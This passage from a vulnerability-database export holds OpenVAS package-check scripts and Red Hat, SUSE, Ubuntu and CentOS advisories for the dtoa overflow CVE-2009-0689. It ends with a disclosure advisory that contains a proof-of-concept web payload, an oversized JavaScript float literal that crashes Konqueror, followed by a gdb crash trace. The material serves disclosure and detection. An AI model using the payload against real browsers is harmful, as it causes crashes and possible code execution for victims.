Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-0689\", \"CVE-2009-3274\", \"CVE-2009-3375\", \"CVE-2009-3376\", \"CVE-2009-3380\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1531\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1531.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1563", "CVE-2009-3376", "CVE-2009-3274", "CVE-2009-3380", "CVE-2009-3375", "CVE-2009-0689"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1531.\n\nSeaMonkey is an open source Web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nA flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file SeaMonkey is\ngoing to download, they can replace the contents of that file with\narbitrary contents. (CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary code\nwith the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A malicious\nwebsite may be able to read highlighted text in a different domain (e.g.\nanother website the user is viewing), bypassing the same-origin policy.\n(CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differs from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that differs from what the user expected.\n(CVE-2009-3376)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2009-3380)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:136141256231066121", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066121", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1531", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1531.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1531 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1531.\n\nSeaMonkey is an open source Web browser, email and newsgroup client, IRC\nchat client, and HTML editor.\n\nA flaw was found in the way SeaMonkey creates temporary file names for\ndownloaded files. If a local attacker knows the name of a file SeaMonkey is\ngoing to download, they can replace the contents of that file with\narbitrary contents. (CVE-2009-3274)\n\nA heap-based buffer overflow flaw was found in the SeaMonkey string to\nfloating point conversion routines. A web page containing malicious\nJavaScript could crash SeaMonkey or, potentially, execute arbitrary code\nwith the privileges of the user running SeaMonkey. (CVE-2009-1563)\n\nA flaw was found in the way SeaMonkey handles text selection. A malicious\nwebsite may be able to read highlighted text in a different domain (e.g.\nanother website the user is viewing), bypassing the same-origin policy.\n(CVE-2009-3375)\n\nA flaw was found in the way SeaMonkey displays a right-to-left override\ncharacter when downloading a file. In these cases, the name displayed in\nthe title bar differs from the name displayed in the dialog body. An\nattacker could use this flaw to trick a user into downloading a file that\nhas a file name or extension that differs from what the user expected.\n(CVE-2009-3376)\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nSeaMonkey. (CVE-2009-3380)\n\nAll SeaMonkey users should upgrade to these updated packages, which correct\nthese issues. After installing the update, SeaMonkey must be restarted for\nthe changes to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66121\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-0689\", \"CVE-2009-3274\", \"CVE-2009-3375\", \"CVE-2009-3376\", \"CVE-2009-3380\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1531\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1531.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.47.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-debuginfo\", rpm:\"seamonkey-debuginfo~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~50.el4_8\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0689"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-default-style\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:66530", "href": "http://plugins.openvas.org/nasl.php?oid=66530", "type": "openvas", "title": "SLES11: Security update for kdelibs3", "sourceData": "#\n#VID 5d7c99e519a95f9108d35c51b0c854c5\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for kdelibs3\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-default-style\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=557126\");\n script_id(66530);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-0689\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES11: Security update for kdelibs3\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kdelibs3\", rpm:\"kdelibs3~3.5.10~23.27.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdelibs3-default-style\", rpm:\"kdelibs3-default-style~3.5.10~23.27.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:37:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-0689"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-default-style\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:136141256231066530", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066530", "type": "openvas", "title": "SLES11: Security update for kdelibs3", "sourceData": "#\n#VID 5d7c99e519a95f9108d35c51b0c854c5\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for kdelibs3\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n kdelibs3\n kdelibs3-default-style\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=557126\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.66530\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-0689\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_name(\"SLES11: Security update for kdelibs3\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kdelibs3\", rpm:\"kdelibs3~3.5.10~23.27.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kdelibs3-default-style\", rpm:\"kdelibs3-default-style~3.5.10~23.27.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-09T00:24:04", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "A buffer overflow was found in the KDE libraries when converting a string \nto a floating point number. If a user or application linked against kdelibs \nwere tricked into processing crafted input, an attacker could cause a \ndenial of service (via application crash) or possibly execute arbitrary \ncode with the privileges of the user invoking the program. (CVE-2009-0689)\n\nIt was discovered that the KDE libraries could use KHTML to process an \nunknown MIME type. If a user or application linked against kdelibs were \ntricked into opening a crafted file, an attacker could potentially trigger \nXMLHTTPRequests to remote sites.", "edition": 5, "modified": "2009-12-11T00:00:00", "published": "2009-12-11T00:00:00", "id": "USN-871-1", "href": "https://ubuntu.com/security/notices/USN-871-1", "title": "KDE vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:26:11", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0689"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1601\n\n\nThe kdelibs packages provide libraries for the K Desktop Environment (KDE).\n\nA buffer overflow flaw was found in the kdelibs string to floating point\nconversion routines. A web page containing malicious JavaScript could crash\nKonqueror or, potentially, execute arbitrary code with the privileges of the\nuser running Konqueror. (CVE-2009-0689)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct this issue. The desktop must be restarted (log out, then\nlog back in) for this update to take effect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028372.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028373.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028374.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-November/028375.html\n\n**Affected packages:**\nkdelibs\nkdelibs-apidocs\nkdelibs-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1601.html", "edition": 3, "modified": "2009-11-27T23:09:54", "published": "2009-11-25T14:52:10", "href": "http://lists.centos.org/pipermail/centos-announce/2009-November/028372.html", "id": "CESA-2009:1601", "title": "kdelibs security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-01T12:00:08", "description": "KDE KDELibs 4.3.3 Remote Array Overrun. CVE-2009-0689. Dos exploit for linux platform", "published": "2009-11-19T00:00:00", "type": "exploitdb", "title": "KDE KDELibs 4.3.3 - Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0689"], "modified": "2009-11-19T00:00:00", "id": "EDB-ID:10184", "href": "https://www.exploit-db.com/exploits/10184/", "sourceData": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]\r\n\r\nAuthor: Maksymilian Arciemowicz and sp3x\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 07.05.2009\r\n- - Pub.: 20.11.2009\r\n\r\nCVE: CVE-2009-0689\r\nRisk: High\r\nRemote: Yes\r\n\r\nAffected Software:\r\n- - KDELibs 4.3.3\r\n\r\nNOTE: Prior versions may also be affected.\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/74\r\n\r\n\r\n- --- 0.Description ---\r\nKDELibs is a collection of libraries built on top of Qt that provides\r\nframeworks and functionality for developers of KDE-compatible software.\r\nThe KDELibs libraries are licensed under LGPL.\r\n\r\n\r\n- --- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code\r\nexecution) ---\r\nThe main problem exist in dtoa implementation. KDE has a very similar\r\ndtoa algorithm to the BSD, Chrome and Mozilla products. Problem exist\r\nin dtoa.cpp file\r\n\r\nhttp://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup\r\n\r\nand it is the same like SREASONRES:20090625.\r\n\r\nhttp://securityreason.com/achievement_securityalert/63\r\n\r\nbut fix for SREASONRES:20090625, used by openbsd was not good.\r\nMore information about fix for openbsd and similars SREASONRES:20091030,\r\n\r\nhttp://securityreason.com/achievement_securityalert/69\r\n\r\nWe can create any number of float, which will overwrite the memory. In\r\nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and\r\nit is possible to call 16<= elements of freelist array.\r\n\r\n\r\n- --- 2. Proof of Concept (PoC) ---\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"9\",299999); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nIf we use konqueror to see this PoC, konqueror will crash. For example\r\n\r\n- -----------------------\r\n<script>\r\nvar a=0.<?php echo str_repeat(\"1\",296450); ?>;\r\n</script>\r\n- -----------------------\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n[Switching to process 24845, thread 0x7e6e6800]\r\n0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n\r\n0x06db85c3 <diff+163>: mov %esi,(%ecx)\r\n\r\n#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0\r\n#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0\r\n#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0\r\n#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0\r\n#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0\r\n#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0\r\n#6 0x0908337f in KJS::InterpreterImp::evaluate ()\r\n\r\n(gdb) i r\r\neax 0x0 0\r\necx 0x220ff000 571469824\r\nedx 0x0 0\r\nebx 0x220fbb00 571456256\r\nesp 0xcfbc04e0 0xcfbc04e0\r\nebp 0xcfbc0518 0xcfbc0518\r\nesi 0xc71c71c7 -954437177\r\nedi 0x0 0\r\neip 0x21415c3 0x21415c3\r\n\r\nesi=0x71c71c7\r\n\r\n\r\n- --- 3. SecurityReason Note ---\r\n\r\nOfficialy SREASONRES:20090625 has been detected in:\r\n- - OpenBSD\r\n- - NetBSD\r\n- - FreeBSD\r\n- - MacOSX\r\n- - Google Chrome\r\n- - Mozilla Firefox\r\n- - Mozilla Seamonkey\r\n- - KDE (example: konqueror)\r\n- - Opera\r\n- - K-Meleon\r\n\r\nThis list is not yet closed. US-CERT declared that will inform all\r\nvendors about this issue, however, they did not do it. Even greater\r\nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed\r\nthat this vulnerability was only detected in Mozilla Firefox, but nobody\r\nwas aware that the problem affects other products like ( KDE, Chrome )\r\nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation\r\nSecurity Advisory\r\n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\";)\r\nwas updated with note :\r\n\"The underlying flaw in the dtoa routines used by Mozilla appears to be\r\nessentially the same as that reported against the libc gdtoa routine by\r\nMaksymilian Arciemowicz ( CVE-2009-0689)\".\r\nThis fact ( new CVE number for Firefox Vulnerability )and PoC in\r\njavascript (from Secunia), forced us to official notification all other\r\nvendors. We publish all the individual advisories, to formally show all\r\nvulnerable software and to avoid wrong CVE number. We do not see any\r\nother way to fix this issue in all products.\r\n\r\n\r\n- --- 4. Fix ---\r\nNetBSD fix (optimal):\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h\r\n\r\nOpenBSD 